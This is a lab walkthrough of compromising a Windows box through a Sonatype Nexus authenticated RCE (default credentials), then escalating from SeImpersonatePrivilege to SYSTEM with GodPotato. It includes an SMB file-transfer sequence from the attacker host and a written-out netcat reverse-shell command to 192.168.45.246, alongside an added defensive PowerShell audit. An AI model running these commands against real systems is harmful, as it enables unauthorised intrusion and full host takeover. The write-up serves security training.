Target IP: 192.168.120.61 Attacker IP: 192.168.45.246
First we begin with some network discovery
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds?
8081/tcp open  http
The Guest account is disabled, so we are unable to enumerate RPC and SMB for now.
We try FTP to test the anonymous account and get error 534 (SSL/TLS required).
We will continue with the two HTTP services hosted on ports 80 and 8081.
BaGet is running on port 80
Sonatype Nexus Repository Manager is running on port 8081. It looks like the version is OSS 3.21.0-05 (weird version name).
It looks like the default credentials for Sonatype do not work.
Let's begin with directory enumeration on BaGet. We will run feroxbuster for directory enumeration and try either gobuster or ffuf for subdomain enumeration.
It looks like our scan is falling short on BaGet, so let's pivot over to Sonatype.
Sonatype comes up with some directories in Feroxbuster.
They are not very helpful, however.
I did find some exploits that could work if we can find credentials for Sonatype Nexus Repository Manager.
This RCE might be able to work, but we need to be authenticated: https://www.exploit-db.com/exploits/49385
We get in with the credentials nexus.
We could have done some brute forcing, but here are some things to keep in mind:
The login form encodes the user and password fields as Base64. We would have to use Hydra together with some form of Base64 encoding of those fields for the submission to work; otherwise it would fail.
Usually on these boxes the passwords are fairly simple, so going that far is unlikely to be necessary, but it is good practice to know how to do it.
The script we obtain from exploit-db works.
We just had to make a few edits to the target IP, as well as to the command being executed.
We used a Base64-encoded PowerShell payload we generated from revshells.
We set up a netcat listener and catch the shell.
We have access as the user account Nathan. Let's now investigate and see how we can perform privilege escalation.
We transfer winPEAS first to do a quick scan:
impacket-smbserver share . -smb2support
net use \\192.168.45.246\share
copy \\192.168.45.246\share\winPEASx64.exe \winPEASx64.exe
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege is enabled for Nathan.
We can escalate privileges using a Potato variant or PrintSpoofer.
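From the defensive side, the enabling condition here is that an ordinary user account holds SeImpersonatePrivilege. The following PowerShell audit, added here and not part of the original writeup, exports the local User Rights Assignment with secedit and resolves every account granted that privilege, so a host can be checked for the same misconfiguration. It assumes an elevated prompt (secedit requires administrative rights) and a writable $env:TEMP.

```powershell
# Added example: list every principal assigned SeImpersonatePrivilege on this host.
# Assumes an elevated PowerShell session; secedit refuses to export otherwise.
$cfg = Join-Path $env:TEMP 'secpol_audit.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null

# The export is an INI file; the line we want sits under [Privilege Rights].
$line = Select-String -Path $cfg -Pattern '^SeImpersonatePrivilege\s*=' | Select-Object -First 1
if (-not $line) {
    Write-Output 'SeImpersonatePrivilege is not assigned in the local policy.'
    Remove-Item $cfg -Force
    return
}

# Right-hand side is a comma-separated list; SIDs are prefixed with '*'.
$entries = ($line.Line -split '=', 2)[1].Trim() -split ','
foreach ($entry in $entries) {
    $entry = $entry.Trim()
    if ($entry.StartsWith('*')) {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.TrimStart('*'))
        try {
            $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            $name = '(unresolved SID)'
        }
        Write-Output ('{0,-45} {1}' -f $sid.Value, $name)
    } else {
        # Some exports list well-known groups by name rather than SID.
        Write-Output $entry
    }
}
Remove-Item $cfg -Force
```

On a default install only LOCAL SERVICE, NETWORK SERVICE, Administrators and SERVICE appear; any interactive user or custom account in this list is a candidate for exactly the escalation shown in this writeup.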
We will try the PrintSpoofer exploit first. We transfer it to the target via our share and then execute it.
PrintSpoofer did not work.
We use GodPotato instead and set up a reverse shell, which works:
.\GodPotato-NET4.exe -cmd "C:\Users\nathan\Documents\nc.exe 192.168.45.246 1234 -e cmd.exe"
From there we have SYSTEM access and can read the last flag we need.